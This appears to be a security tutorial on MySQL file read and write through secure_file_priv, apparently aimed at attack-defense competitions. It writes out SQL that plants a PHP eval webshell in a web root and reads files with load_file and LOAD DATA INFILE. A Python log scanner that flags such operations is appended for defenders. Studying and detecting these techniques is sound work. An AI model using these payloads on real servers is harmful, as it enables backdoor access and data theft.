MySQL arbitrary file read/write vulnerability

0x00 Configuration

secure_file_priv: controls the scope of file operations (where the server may read from and write to).
Default configuration file: /etc/my.cnf; the option is not present by default and has to be added manually.
Note: this variable is read-only and cannot be changed at runtime with something like set secure_file_priv='/'.
```sql
mysql> show session variables like '%secure%';
+--------------------------+-----------------------+
| Variable_name            | Value                 |
+--------------------------+-----------------------+
| require_secure_transport | OFF                   |
| secure_auth              | ON                    |
| secure_file_priv         | /var/lib/mysql-files/ |
+--------------------------+-----------------------+
```
0x01 Write

Writing a file has strict requirements: the target must be an absolute path under the directory set in secure_file_priv, and the target directory must have 777 permissions.

select [write_shell] into outfile [path_file]: writes a file
```sql
mysql> select '<?php eval($_POST[\'shell\'])?>' into outfile '/var/www/html/shell.php';
Query OK, 1 row affected (0.00 sec)
```
```shell
[root@zzy /]# cat shell.php
<?php eval($_POST['shell'])?>
```
select [write_shell] into dumpfile <path_file>: writes a file in binary mode, almost the same as above
```sql
mysql> select '<?php eval($_POST[\'shell\'])?>' into dumpfile '/var/www/html/shell.php';
```
0x02 Read

Reading a file is much easier: the file only has to be under the secure_file_priv path, and any file under that path can be read. This can be surprisingly effective in some AWD competitions.

select load_file(<path_file>): reads a file; here we read back the file written above
```sql
mysql> select load_file('/var/www/html/shell.php');
+--------------------------------------+
| load_file('/var/www/html/shell.php') |
+--------------------------------------+
| <?php eval($_POST['shell'])?>        |
+--------------------------------------+
1 row in set (0.13 sec)
```
load data infile '<file_path>' into table <table_name> (<column_name>): reads a file and stores its contents in the given table column
```sql
mysql> load data infile '/var/www/html/shell.php' into table test(readfile);
Query OK, 1 row affected (0.10 sec)
Records: 1  Deleted: 0  Skipped: 0  Warnings: 0

mysql> select readfile from test;
+-------------------------------+
| readfile                      |
+-------------------------------+
| <?php eval($_POST['shell'])?> |
+-------------------------------+
1 row in set (0.00 sec)
```
Note: in 5.x versions the system command of the mysql client can be used to invoke a system shell; it only works locally.
```shell
mysql> system cat /var/www/html/shell.php
<?php eval($_POST['shell'])?>
```
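As an added example (not part of the original post), the following Python script takes the secure_file_priv rule from the configuration section and the four file primitives shown above and applies them to MySQL general-log lines, so a defender can see every INTO OUTFILE / DUMPFILE write and LOAD_FILE / LOAD DATA INFILE read and whether the configured directory would have permitted it. The log lines are constructed samples; the secure_file_priv semantics (NULL refuses all file operations, an empty string allows any path, a directory restricts to that tree) follow the MySQL documentation.

```python
import posixpath
import re
from typing import Optional

# Constructed sample of MySQL general-log lines (not captured from a real server).
SAMPLE_LOG = """\
2024-01-01T10:00:00.000000Z    12 Query  select 'hello' into outfile '/var/www/html/shell.php'
2024-01-01T10:00:01.000000Z    12 Query  select load_file('/var/www/html/shell.php')
2024-01-01T10:00:02.000000Z    13 Query  load data infile '/var/lib/mysql-files/export.csv' into table t(c)
2024-01-01T10:00:03.000000Z    14 Query  select id from users where id = 1
2024-01-01T10:00:04.000000Z    15 Query  select 'x' into dumpfile '/tmp/x.php'
"""

# The file primitives discussed on the page, each capturing the server-side path.
# LOAD DATA LOCAL INFILE reads the client's file and is deliberately not matched here.
FILE_OPS = [
    ("write", re.compile(r"into\s+(?:outfile|dumpfile)\s+'(?P<path>[^']*)'", re.I)),
    ("read", re.compile(r"load_file\s*\(\s*'(?P<path>[^']*)'\s*\)", re.I)),
    ("read", re.compile(r"load\s+data\s+infile\s+'(?P<path>[^']*)'", re.I)),
]


def path_allowed(path: str, secure_file_priv: Optional[str]) -> bool:
    """Mirror the server's secure_file_priv check: None (NULL) refuses every
    file operation, '' (the weak setting) allows any path, and a directory
    allows only paths inside that directory after '..' normalisation."""
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    base = posixpath.normpath(secure_file_priv)
    target = posixpath.normpath(path)
    return target == base or target.startswith(base + "/")


def scan_general_log(text: str, secure_file_priv: Optional[str]) -> list:
    """Return one finding per file operation in the log: access kind, path,
    and whether the configured secure_file_priv would have permitted it."""
    findings = []
    for line in text.splitlines():
        for kind, rx in FILE_OPS:
            m = rx.search(line)
            if m:
                path = m.group("path")
                findings.append({"kind": kind, "path": path,
                                 "allowed": path_allowed(path, secure_file_priv)})
                break
    return findings


if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG, "/var/lib/mysql-files/"):
        flag = "ok" if f["allowed"] else "ALERT: outside secure_file_priv"
        print(f"{f['kind']:5} {f['path']:40} {flag}")
```

Run the same scan with secure_file_priv set to "" to see that every operation is permitted, which is the configuration the rest of this page relies on.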